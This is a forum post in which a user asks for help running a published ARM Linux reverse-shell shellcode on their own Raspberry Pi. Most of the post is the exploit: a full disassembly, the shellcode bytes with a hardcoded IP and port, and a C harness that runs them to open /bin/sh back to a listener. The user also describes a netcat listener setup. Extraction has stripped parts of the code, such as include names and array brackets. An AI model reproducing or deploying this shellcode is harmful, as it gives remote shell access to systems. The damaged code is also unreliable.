Does Anyone Know How to Use This Exploit?

Hi,

I want to use this exploit to test my raspberrypi.

The Problem is that I don't really understand how...

There is no description how to use it:

/*

Title: Linux/ARM - reverse_shell(tcp,10.1.1.2,0x1337)

execve("/bin/sh", 0, 0 vars) - 72 bytes

Date: 2012-09-08

Tested on: ARM1176JZF-S (v6l) - Raspberry Pi

Author: midnitesnake

00008054 <_start>:

8054: e28f1001 add r1, pc, #1

8058: e12fff11 bx r1

805c: 2002 movs r0, #2

805e: 2101 movs r1, #1

8060: 1a92 subs r2, r2, r2

8062: 020f lsls r7, r1, #8

8064: 3719 adds r7, #25

8066: df01 svc 1

8068: 1c06 adds r6, r0, #0

806a: a108 add r1, pc, #32 ; (adr r1,

808c )

806c: 2210 movs r2, #16

806e: 3702 adds r7, #2

8070: df01 svc 1

8072: 273f movs r7, #63 ; 0x3f

8074: 2102 movs r1, #2

00008076 :

8076: 1c30 adds r0, r6, #0

8078: df01 svc 1

807a: 3901 subs r1, #1

807c: d5fb bpl.n 8076

807e: a005 add r0, pc, #20 ; (adr r0,

8094 )

8080: 1a92 subs r2, r2, r2

8082: b405 push {r0, r2}

8084: 4669 mov r1, sp

8086: 270b movs r7, #11

8088: df01 svc 1

808a: 46c0 nop ; (mov r8, r8)

808c: 37130002 .word 0x37130002

8090: 0301010a .word 0x0301010a

8094: 6e69622f .word 0x6e69622f

8098: 0068732f .word 0x0068732f

809c: 00 .byte 0x00

809d: 00 .byte 0x00

809e: 46c0 nop ; (mov r8, r8)

*/

#include

#include

#define SWAP16(x) ((x) << 8 | ((x) >> 8))

const unsigned char sc = {

0x01, 0x10, 0x8F, 0xE2,

0x11, 0xFF, 0x2F, 0xE1,

0x02, 0x20, 0x01, 0x21,

0x92, 0x1a, 0x0f, 0x02,

0x19, 0x37, 0x01, 0xdf,

0x06, 0x1c, 0x08, 0xa1,

0x10, 0x22, 0x02, 0x37,

0x01, 0xdf, 0x3f, 0x27,

0x02, 0x21,

0x30, 0x1c, 0x01, 0xdf,

0x01, 0x39, 0xfb, 0xd5,

0x05, 0xa0, 0x92, 0x1a,

0x05, 0xb4, 0x69, 0x46,

0x0b, 0x27,0x01, 0xdf,

0xc0, 0x46,

/ struct sockaddr /

0x02, 0x00,

/ port: 0x1337 /

0x13, 0x37,

/ ip: 10.1.1.2 /

0x0A, 0x01, 0x01, 0x02,

/ "/bin/sh\0" /

0x2f, 0x62, 0x69, 0x6e,0x2f, 0x73, 0x68, 0x00

};

int main()

{

printf("shellcode=%d bytes\n"

"connecting to %d.%d.%d.%d:%hd\n", sizeof sc,

sc0x3c, sc0x3d, sc0x3e, sc0x3f,

SWAP16(((unsigned short )(sc+0x3a))));

return ((int (*)(void))sc)();

}

Also I tried to run the code on both machines, the RPi and my common pc.

It is only running on the Raspberry-Pi so I guess it has to be run there.

I converted the IP of my common PC into HEX and replaced it with the one in the code.

Then i started with netcat a listener on Port 4919(0x1337) and started the Programm on the RPi.

But nothing happens :/ the Programm on the Pi tries to connect to the given IP-address but is unsuccesfull...

Do I have to use a different listener?

The file is a .asm file.

which confuses me even more, because it is not written in assembly, so i compiled it with gcc.

It would be great if one of you knew a solution.